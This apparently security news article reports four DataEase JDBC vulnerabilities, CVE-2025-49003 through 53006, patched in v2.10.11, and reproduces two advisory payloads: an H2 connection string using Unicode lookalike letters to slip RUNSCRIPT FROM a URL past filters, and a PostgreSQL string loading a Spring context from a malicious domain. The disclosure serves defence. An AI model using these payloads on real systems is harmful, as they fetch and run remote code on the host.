
DataEase, an open-source business intelligence (BI) platform known for its ease of use and data visualization capabilities, has been found to contain several critical vulnerabilities in its database connection handling mechanisms. These flaws, if exploited, can allow remote attackers to gain unauthorized access, bypass JDBC parameter filtering, and in some cases execute arbitrary code on the host system. The vulnerabilities affect all versions up to and including v2.10.10 and have been patched in v2.10.11.
CVE-2025-49003: H2 JDBC Unicode-based Remote Code Execution
CVE-2025-49003 affects the H2 database integration and leverages Java’s Unicode character transformation behavior. In Java, the lowercase letter “ı” becomes “I”, and “ſ” becomes “S” when converted to uppercase. Attackers can use these characters to disguise INIT commands in the connection string, bypassing traditional pattern detection that relies on exact casing. A sample payload uses:
jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;ıNIT=RUNſCRIPT FROM ‘http://127.0.0.1:50025/poc.sql’
Because most filters look for uppercase INIT, this trick lets malicious commands slip through undetected. Once executed, the payload fetches and runs a remote script file, achieving full remote code execution on the host system.
CVE-2025-53004: Redshift JDBC Connection Parameter Bypass
One of the most severe vulnerabilities identified is CVE-2025-53004, which affects Redshift data source connections in DataEase. While the software had implemented filters to detect and block risky JDBC parameters like socketFactory and socketFactoryArg, it failed to consider alternatives such as sslfactory and sslfactoryarg. By abusing these overlooked parameters, an attacker can craft a malicious connection string that references an external XML payload, effectively injecting untrusted configurations. As stated in the advisory, “although the socketFactory and socketFactoryArg parameters in the JDBC string can now be detected, the sslfactory and sslfactoryarg parameters can also trigger this bypass vulnerability.” Once triggered, this vulnerability allows the execution of external logic loaded from attacker-controlled infrastructure.
CVE-2025-53005: PostgreSQL JDBC Parameter Injection
Targeting PostgreSQL integrations specifically, CVE-2025-53005 exposes another method to execute remote content by injecting malicious parameters into the JDBC connection string. A specially crafted connection string using sslfactory and sslfactoryarg can instruct the application to load Spring Framework objects from a remote server. An example provided in the advisory uses the payload:
jdbc:postgresql://vps:5433/testdb?sslfactory=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext&sslfactoryarg=http://malicious-domain.
This bypass works by exploiting the application’s trust in the JDBC configuration without properly validating the origin of the content. As a result, attackers may remotely execute arbitrary Java logic under the guise of a valid database connection.
CVE-2025-53006: PostgreSQL and Redshift JDBC Extended Parameter Bypass
CVE-2025-53006 expands on the previous vulnerability by targeting a broader range of JDBC parameters. It affects both PostgreSQL and Redshift connectors and leverages fields such as sslhostnameverifier, sslpasswordcallback, and authenticationPluginClassName. These parameters are not filtered effectively, especially when they are evaluated after the connection has been established. Attackers can use these fields to manipulate the JDBC environment post-authentication, allowing stealthy loading of Java classes such as FileSystemXmlApplicationContext from remote sources. The advisory explains that “this can only be triggered after establishing a connection,” making detection difficult. This creates a significant risk of persistent backdoor execution, especially in automated BI workflows.
Related Posts:
- CVE-2024-56511: Critical Authentication Bypass Vulnerability in DataEase
- From Magecart Mayhem to Ransomware Revamp: Inside ESET’s H2 2023 Cyber Threatscape
- Trio of SQL Injection Flaws Strike Amazon Redshift Drivers: Patch Immediately
- Amazon Redshift Alert: OAuth2 Vulnerability Exposes Data
- CVE-2024-32888 (CVSS 10): SQLi Vulnerability Discovered in Amazon Redshift JDBC Driver